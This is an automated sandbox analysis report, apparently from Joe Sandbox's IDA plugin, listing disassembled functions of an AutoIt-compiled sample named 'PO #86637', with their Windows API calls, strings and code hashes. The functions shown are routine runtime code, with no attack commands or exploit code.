                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: Clipboard$Close$AvailableDataFormat$GlobalLockOpen
                      • String ID:
                      • API String ID: 15083398-0
                      • Opcode ID: 5d52f7a8e2fbd0ab087c8c139685d9916ac200a5779b15fccd04bfb456a25eb2
                      • Instruction ID: c6f05cb0c77453757aa6b00544986da50a17ac1627668c5aecb5782462309948
                      • Opcode Fuzzy Hash: 5d52f7a8e2fbd0ab087c8c139685d9916ac200a5779b15fccd04bfb456a25eb2
                      • Instruction Fuzzy Hash: CE81B072704201ABD310EF65DD8AB5EB7A8FF94315F00482EF605E72D1EB74E905879A
                      Function 00471BC9 Relevance: 35.3, APIs: 18, Strings: 2, Instructions: 313windowtimeCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                      • GetWindowRect.USER32(?,?), ref: 00471CF7
                      • GetClientRect.USER32(?,?), ref: 00471D05
                      • GetSystemMetrics.USER32(00000007), ref: 00471D0D
                      • GetSystemMetrics.USER32(00000008), ref: 00471D20
                      • GetSystemMetrics.USER32(00000004), ref: 00471D42
                      • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00471D71
                      • GetSystemMetrics.USER32(00000007), ref: 00471D79
                      • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00471DA3
                      • GetSystemMetrics.USER32(00000008), ref: 00471DAB
                      • GetSystemMetrics.USER32(00000004), ref: 00471DCF
                      • SetRect.USER32(?,00000000,00000000,?,?), ref: 00471DEE
                      • AdjustWindowRectEx.USER32(?,?,00000000,00000040), ref: 00471DFF
                      • CreateWindowExW.USER32(00000040,AutoIt v3 GUI,?,?,?,?,?,?,?,00000000,00400000,00000000), ref: 00471E35
                      • SetWindowLongW.USER32(00000000,000000EB,?), ref: 00471E6E
                      • GetClientRect.USER32(?,?), ref: 00471E8A
                      • GetStockObject.GDI32(00000011), ref: 00471EA6
                      • SendMessageW.USER32(?,00000030,00000000), ref: 00471EB2
                      • SetTimer.USER32(00000000,00000000,00000028,00462986), ref: 00471ED9
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: System$Metrics$Rect$Window$ClientInfoParameters$AdjustCreateLongMessageObjectSendStockTimer_malloc
                      • String ID: @$AutoIt v3 GUI
                      • API String ID: 867697134-3359773793
                      • Opcode ID: d466945cffb50a7196a7867ec3c7573785653ff52612d7c288cf7d01b72dc8e8
                      • Instruction ID: 8cf5fd9e7b0abf2f472dad9b41bae804ea9cb1b32c1b51d65689880f1cfe2d6c
                      • Opcode Fuzzy Hash: d466945cffb50a7196a7867ec3c7573785653ff52612d7c288cf7d01b72dc8e8
                      • Instruction Fuzzy Hash: 7DC17F71A402059FDB14DFA8DD85BAF77B4FB58714F10862EFA09A7290DB78A840CB58
                      Function 00469296 Relevance: 33.4, APIs: 6, Strings: 13, Instructions: 116COMMON
                      Download Yara Rule
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: __wcsicoll$__wcsnicmp
                      • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:$pQH
                      • API String ID: 790654849-32604322
                      • Opcode ID: 29d435e902b015a153743909057decd258383f7606cc46ad0233eead686698a2
                      • Instruction ID: c91e69f26a1c2718e03151092e39642ccf44f92bf630fd0466772f198d10bc2a
                      • Opcode Fuzzy Hash: 29d435e902b015a153743909057decd258383f7606cc46ad0233eead686698a2
                      • Instruction Fuzzy Hash: CA317731A0420966DB10FAA2DD46BAE736C9F15315F20053BBD00BB2D5E7BC6E4587AE
                      Function 00455A89 Relevance: 31.9, APIs: 21, Instructions: 395COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 7b3c0986a6774ad4839bdf3b3ab280162fe8917d12771473e04c5712f0602a0a
                      • Instruction ID: 62dae473257cc2caee0a49c5626d46440081d624880130feb25903cd50123649
                      • Opcode Fuzzy Hash: 7b3c0986a6774ad4839bdf3b3ab280162fe8917d12771473e04c5712f0602a0a
                      • Instruction Fuzzy Hash: 84C128727002046BE724CFA8DC46FAFB7A4EF55311F00416AFA05DA2C1EBB99909C795
                      Function 00452AC7 Relevance: 31.8, APIs: 21, Instructions: 343COMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 00442C5A: __time64.LIBCMT ref: 00442C66
                      • _fseek.LIBCMT ref: 00452B3B
                      • __wsplitpath.LIBCMT ref: 00452B9B
                      • _wcscpy.LIBCMT ref: 00452BB0
                      • _wcscat.LIBCMT ref: 00452BC5
                      • __wsplitpath.LIBCMT ref: 00452BEF
                      • _wcscat.LIBCMT ref: 00452C07
                      • _wcscat.LIBCMT ref: 00452C1C
                      • __fread_nolock.LIBCMT ref: 00452C53
                      • __fread_nolock.LIBCMT ref: 00452C64
                      • __fread_nolock.LIBCMT ref: 00452C83
                      • __fread_nolock.LIBCMT ref: 00452C94
                      • __fread_nolock.LIBCMT ref: 00452CB5
                      • __fread_nolock.LIBCMT ref: 00452CC6
                      • __fread_nolock.LIBCMT ref: 00452CD7
                      • __fread_nolock.LIBCMT ref: 00452CE8
                        • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 0045273E
                        • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 00452780
                        • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 0045279E
                        • Part of subcall function 00452719: _wcscpy.LIBCMT ref: 004527D2
                        • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 004527E2
                        • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 00452800
                        • Part of subcall function 00452719: _wcscpy.LIBCMT ref: 00452831
                      • __fread_nolock.LIBCMT ref: 00452D78
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: __fread_nolock$_wcscat_wcscpy$__wsplitpath$__time64_fseek
                      • String ID:
                      • API String ID: 2054058615-0
                      • Opcode ID: 0fea368d492e8b0ff51cb8fd7897a71ebf5dc00d39f6f8cf48bc83bd06102a16
                      • Instruction ID: 04d0e47ed4a2b248740d2851a73093f1b496c65d3ae4d984919b8c0089c9d159
                      • Opcode Fuzzy Hash: 0fea368d492e8b0ff51cb8fd7897a71ebf5dc00d39f6f8cf48bc83bd06102a16
                      • Instruction Fuzzy Hash: 6FC14EB2508340ABD720DF65D881EEFB7E8EFC9704F40492FF68987241E6759548CB66
                      Function 0044870C Relevance: 31.8, APIs: 17, Strings: 1, Instructions: 311COMMON
                      Download Yara Rule
                      APIs
                      • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 004487BD
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: Window
                      • String ID: 0
                      • API String ID: 2353593579-4108050209
                      • Opcode ID: b0df0e29545e706fc7615ccb9c436c62dbee4145767baabea16aca18bd76baa2
                      • Instruction ID: 06508bea8339de1511a48146ac1d08a96458f0089f80555ee302a354f7131a6f
                      • Opcode Fuzzy Hash: b0df0e29545e706fc7615ccb9c436c62dbee4145767baabea16aca18bd76baa2
                      • Instruction Fuzzy Hash: 35B18BB0204341ABF324CF24CC89BABBBE4FB89744F14491EF591962D1DBB8A845CB59
                      Function 0044A032 Relevance: 31.7, APIs: 21, Instructions: 198windowCOMMON
                      Download Yara Rule
                      APIs
                      • GetSysColor.USER32(0000000F), ref: 0044A05E
                      • GetClientRect.USER32(?,?), ref: 0044A0D1
                      • SendMessageW.USER32(?,00001328,00000000,?), ref: 0044A0E9
                      • GetWindowDC.USER32(?), ref: 0044A0F6
                      • GetPixel.GDI32(00000000,?,?), ref: 0044A108
                      • ReleaseDC.USER32(?,?), ref: 0044A11B
                      • GetSysColor.USER32(0000000F), ref: 0044A131
                      • GetWindowLongW.USER32(?,000000F0), ref: 0044A140
                      • GetSysColor.USER32(0000000F), ref: 0044A14F
                      • GetSysColor.USER32(00000005), ref: 0044A15B
                      • GetWindowDC.USER32(?), ref: 0044A1BE
                      • GetPixel.GDI32(00000000,00000000,00000000), ref: 0044A1CB
                      • GetPixel.GDI32(00000000,?,00000000), ref: 0044A1E4
                      • GetPixel.GDI32(00000000,00000000,?), ref: 0044A1FD
                      • GetPixel.GDI32(00000000,?,?), ref: 0044A21D
                      • ReleaseDC.USER32(?,00000000), ref: 0044A229
                      • SetBkColor.GDI32(?,00000000), ref: 0044A24C
                      • GetSysColor.USER32(00000008), ref: 0044A265
                      • SetTextColor.GDI32(?,00000000), ref: 0044A270
                      • SetBkMode.GDI32(?,00000001), ref: 0044A282
                      • GetStockObject.GDI32(00000005), ref: 0044A28A
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: Color$Pixel$Window$Release$ClientLongMessageModeObjectRectSendStockText
                      • String ID:
                      • API String ID: 1744303182-0
                      • Opcode ID: e73dd003506282a75ec33c48a00615cd632731ac0e25c139f5641f86d6275693
                      • Instruction ID: 0380b5c53d8a23173c1b90063483f03488caaf4f58ae5d2001aea5c06c56dff4
                      • Opcode Fuzzy Hash: e73dd003506282a75ec33c48a00615cd632731ac0e25c139f5641f86d6275693
                      • Instruction Fuzzy Hash: E6612531140101ABE7109F78CC88BAB7764FB46320F14876AFD659B3D0DBB49C529BAA
                      Function 00417C20 Relevance: 29.9, APIs: 12, Strings: 5, Instructions: 109libraryloadermemoryCOMMON
                      Download Yara Rule
                      APIs
                      • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,004164DE), ref: 00417C28
                      • __mtterm.LIBCMT ref: 00417C34
                        • Part of subcall function 004178FF: TlsFree.KERNEL32(00000017,00417D96,?,004164DE), ref: 0041792A
                        • Part of subcall function 004178FF: DeleteCriticalSection.KERNEL32(00000000,00000000,00410E44,?,00417D96,?,004164DE), ref: 004181B8
                        • Part of subcall function 004178FF: _free.LIBCMT ref: 004181BB
                        • Part of subcall function 004178FF: DeleteCriticalSection.KERNEL32(00000017,00410E44,?,00417D96,?,004164DE), ref: 004181E2
                      • GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00417C4A
                      • GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00417C57
                      • GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00417C64
                      • GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00417C71
                      • TlsAlloc.KERNEL32(?,004164DE), ref: 00417CC1
                      • TlsSetValue.KERNEL32(00000000,?,004164DE), ref: 00417CDC
                      • __init_pointers.LIBCMT ref: 00417CE6
                      • __calloc_crt.LIBCMT ref: 00417D54
                      • GetCurrentThreadId.KERNEL32 ref: 00417D80
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: AddressProc$CriticalDeleteSection$AllocCurrentFreeHandleModuleThreadValue__calloc_crt__init_pointers__mtterm_free
                      • String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
                      • API String ID: 4163708885-3819984048
                      • Opcode ID: b664ad2f65df639e4a6a12b7ff6e2ff430dd15d20f416fce335d42a987fa1153
                      • Instruction ID: ca22d9d2e1075830452d52834408fe47c465c3b6ac2468b12672dd77d4d5938c
                      • Opcode Fuzzy Hash: b664ad2f65df639e4a6a12b7ff6e2ff430dd15d20f416fce335d42a987fa1153
                      • Instruction Fuzzy Hash: D5315A75808710DECB10AF75BD0865A3EB8BB60764B12093FE914932B0DB7D8881CF9C
                      Function 004341E6 Relevance: 26.3, APIs: 10, Strings: 5, Instructions: 91windowCOMMON
                      Download Yara Rule
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: __wcsicoll$IconLoad
                      • String ID: blank$info$question$stop$warning
                      • API String ID: 2485277191-404129466
                      • Opcode ID: 90066845996854fde84de619c40f1fe09919dc61d56db525c82daa747bae1459
                      • Instruction ID: a4c8356a5cb7371e963c7ba7671977edd7eb5cf64b0a9c0e84f2fcb3e6131cad
                      • Opcode Fuzzy Hash: 90066845996854fde84de619c40f1fe09919dc61d56db525c82daa747bae1459
                      • Instruction Fuzzy Hash: 9121A732B4021566DB00AB65BC05FEF3358DB98762F040837FA05E2282E3A9A52093BD
                      Function 00454639 Relevance: 25.7, APIs: 17, Instructions: 199windowtimeCOMMON
                      Download Yara Rule
                      APIs
                      • LoadIconW.USER32(?,00000063), ref: 0045464C
                      • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 0045465E
                      • SetWindowTextW.USER32(?,?), ref: 00454678
                      • GetDlgItem.USER32(?,000003EA), ref: 00454690
                      • SetWindowTextW.USER32(00000000,?), ref: 00454697
                      • GetDlgItem.USER32(?,000003E9), ref: 004546A8
                      • SetWindowTextW.USER32(00000000,?), ref: 004546AF
                      • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 004546D1
                      • SendDlgItemMessageW.USER32(?,000003E9,000000C5,?,00000000), ref: 004546EB
                      • GetWindowRect.USER32(?,?), ref: 004546F5
                      • SetWindowTextW.USER32(?,?), ref: 00454765
                      • GetDesktopWindow.USER32 ref: 0045476F
                      • GetWindowRect.USER32(00000000), ref: 00454776
                      • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 004547C4
                      • GetClientRect.USER32(?,?), ref: 004547D2
                      • PostMessageW.USER32(?,00000005,00000000,00000080), ref: 004547FC
                      • SetTimer.USER32(?,0000040A,?,00000000), ref: 0045483F
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
                      • String ID:
                      • API String ID: 3869813825-0
                      • Opcode ID: 7299b5a8a54a0497ad48b5c2470d2d1877852c465202323cb5b3bdfcc53dc08d
                      • Instruction ID: 23cbb84c7db07f79204f7fb68ef1a354279dd66d41dce19f663d7a5246859b32
                      • Opcode Fuzzy Hash: 7299b5a8a54a0497ad48b5c2470d2d1877852c465202323cb5b3bdfcc53dc08d
                      • Instruction Fuzzy Hash: 06619D75A00705ABD720DFA8CE89F6FB7F8AB48705F00491DEA46A7290D778E944CB54
                      Function 004649A3 Relevance: 24.9, APIs: 13, Strings: 1, Instructions: 395COMMON
                      Download Yara Rule
                      APIs
                      • _wcslen.LIBCMT ref: 00464B28
                      • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00464B38
                      • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00464B60
                      • _wcslen.LIBCMT ref: 00464C28
                      • GetCurrentDirectoryW.KERNEL32(00000000,00000000,?), ref: 00464C3C
                      • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00464C64
                      • _wcslen.LIBCMT ref: 00464CBA
                      • _wcslen.LIBCMT ref: 00464CD0
                      • _wcslen.LIBCMT ref: 00464CEF
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: _wcslen$Directory$CurrentSystem
                      • String ID: D
                      • API String ID: 1914653954-2746444292
                      • Opcode ID: 44be7054643fd4ba856d6b2e359bfbfbb3de9f7e14d5395c76b411fe07bee919
                      • Instruction ID: cb0983c86ca1fa87ccea60adda1cf5635047c5df12380c224dcb23d097980814
                      • Opcode Fuzzy Hash: 44be7054643fd4ba856d6b2e359bfbfbb3de9f7e14d5395c76b411fe07bee919
                      • Instruction Fuzzy Hash: 98E101716043409BD710EF65C845B6BB7E4AFC4308F148D2EF98987392EB39E945CB9A
                      Function 0045CD1E Relevance: 24.7, APIs: 13, Strings: 1, Instructions: 215COMMON
                      Download Yara Rule
                      APIs
                      • _wcsncpy.LIBCMT ref: 0045CE39
                      • __wsplitpath.LIBCMT ref: 0045CE78
                      • _wcscat.LIBCMT ref: 0045CE8B
                      • _wcscat.LIBCMT ref: 0045CE9E
                      • GetCurrentDirectoryW.KERNEL32(00000104,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CEB2
                      • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,00000104,?), ref: 0045CEC5
                        • Part of subcall function 00433998: GetFileAttributesW.KERNEL32(?), ref: 0043399F
                      • GetFileAttributesW.KERNEL32(?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CF05
                      • SetFileAttributesW.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CF1D
                      • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CF2E
                      • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CF3F
                      • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CF53
                      • _wcscpy.LIBCMT ref: 0045CF61
                      • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CFA4
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: CurrentDirectory$AttributesFile$_wcscat$__wsplitpath_wcscpy_wcsncpy
                      • String ID: *.*
                      • API String ID: 1153243558-438819550
                      • Opcode ID: 28b8a1e182566b38844f77773a79acdc9f60bea9bca2776be04cde59cc8a5d2f
                      • Instruction ID: eacc2f87ca0c49a88fd160cf35c0ab61f7b8ac52d7ffc0430f804bda47b2a69a
                      • Opcode Fuzzy Hash: 28b8a1e182566b38844f77773a79acdc9f60bea9bca2776be04cde59cc8a5d2f
                      • Instruction Fuzzy Hash: F071D572900208AEDB24DB54CCC5AEEB7B5AB44305F1489ABE805D7242D67C9ECDCB99
                      Function 0044B98C Relevance: 24.6, APIs: 7, Strings: 7, Instructions: 80COMMON
                      Download Yara Rule
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: __wcsicoll
                      • String ID: LEFT$MAIN$MENU$MIDDLE$PRIMARY$RIGHT$SECONDARY
                      • API String ID: 3832890014-4202584635
